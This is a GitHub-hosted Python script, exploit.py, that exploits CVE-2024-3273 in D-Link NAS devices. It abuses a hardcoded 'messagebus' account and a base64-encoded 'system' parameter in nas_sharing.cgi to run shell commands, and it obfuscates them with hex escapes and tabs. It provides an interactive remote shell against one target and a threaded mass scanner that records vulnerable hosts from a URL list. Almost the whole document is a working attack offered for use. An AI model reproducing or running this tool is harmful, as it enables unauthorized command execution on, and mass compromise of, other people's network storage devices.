-
Notifications
You must be signed in to change notification settings - Fork 21
/
Copy pathexploit.py
148 lines (131 loc) · 5.53 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
import base64
import requests
import argparse
from rich.console import Console
from alive_progress import alive_bar
from typing import Tuple, Optional, List
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
from concurrent.futures import ThreadPoolExecutor, as_completed
from requests.packages.urllib3.exceptions import InsecureRequestWarning
class DLink:
def __init__(self, base_url: Optional[str]=None) -> None:
self.base_url: Optional[str] = base_url
self.session: requests.Session = requests.Session()
self.console: Console = Console()
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def custom_print(self, message: str, header: str) -> None:
header_colors: dict = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
self.console.print(
f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}"
)
def execute_command(self, command: str = "id", verbose: bool = True) -> str:
command_hex = ''.join(f'\\\\x{ord(c):02x}' for c in command)
command_final = f"echo -e {command_hex}|sh".replace(' ', '\t')
base64_cmd: str = base64.b64encode(command_final.encode()).decode()
url: str = f"{self.base_url}/cgi-bin/nas_sharing.cgi"
params: dict = {
"user": "messagebus",
"passwd": "",
"cmd": "15",
"system": base64_cmd,
}
try:
response: requests.Response = self.session.get(
url, params=params, verify=False, timeout=10
)
result: str = (
response.text.split("<?xml", 1)[0]
if "<?xml" in response.text
else None
)
if verbose:
self.custom_print(
"Command executed successfully."
if result
else "Failed to execute command.",
"+" if result else "-",
)
return result
except requests.exceptions.Timeout:
if verbose:
self.custom_print("Request timed out.", "-")
except requests.exceptions.RequestException as e:
if verbose:
self.custom_print(f"Request failed: {e}", "-")
def check_single_url(self, url: str) -> Tuple[str, bool]:
self.base_url = url
result: str = self.execute_command(verbose=False)
is_vulnerable: bool = bool(result)
return f"{url} is vulnerable to CVE-2024-3273: {result}", is_vulnerable
def interactive_shell(self) -> None:
initial_result = self.execute_command()
if initial_result:
self.custom_print(
f"{self.base_url} is vulnerable to CVE-2024-3273: {initial_result}", "!"
)
self.custom_print("Opening interactive shell...", "+")
session: PromptSession = PromptSession(history=InMemoryHistory())
while True:
try:
cmd: str = session.prompt(
HTML("<ansiyellow><b># </b></ansiyellow>"), default=""
).strip()
if cmd.lower() == "exit":
break
elif cmd.lower() == "clear":
self.console.clear()
continue
output: str = self.execute_command(cmd)
if output:
print(f"{output}\n")
except KeyboardInterrupt:
self.custom_print("Exiting interactive shell...", "!")
break
else:
self.custom_print("System is not vulnerable or check failed.", "-")
def check_urls_and_write_output(
self, urls: List[str], max_workers: int, output_path: Optional[str]
) -> None:
with ThreadPoolExecutor(max_workers=max_workers) as executor, alive_bar(
len(urls), enrich_print=False
) as bar:
futures = {executor.submit(self.check_single_url, url): url for url in urls}
for future in as_completed(futures):
result, is_vulnerable = future.result()
if is_vulnerable:
self.custom_print(result, "+")
if output_path:
with open(output_path, "a") as file:
file.write(result)
bar()
def main() -> None:
parser: argparse.ArgumentParser = argparse.ArgumentParser()
parser.add_argument(
"-u", "--url", help="Base URL for single target", default=None
)
parser.add_argument(
"-f", "--file", help="File containing list of URLs", default=None
)
parser.add_argument(
"-t", "--threads", help="Number of threads to use", type=int, default=20
)
parser.add_argument(
"-o", "--output", help="Output file to save results", default=None
)
args: argparse.Namespace = parser.parse_args()
if args.url:
dlink: DLink = DLink(args.url)
dlink.interactive_shell()
elif args.file:
with open(args.file, "r") as f:
urls: List[str] = f.read().splitlines()
dlink = DLink()
dlink.check_urls_and_write_output(urls, args.threads, args.output)
else:
parser.error(
"No URL or file provided. Use -u to specify a single URL or -f to specify a file containing URLs."
)
if __name__ == "__main__":
main()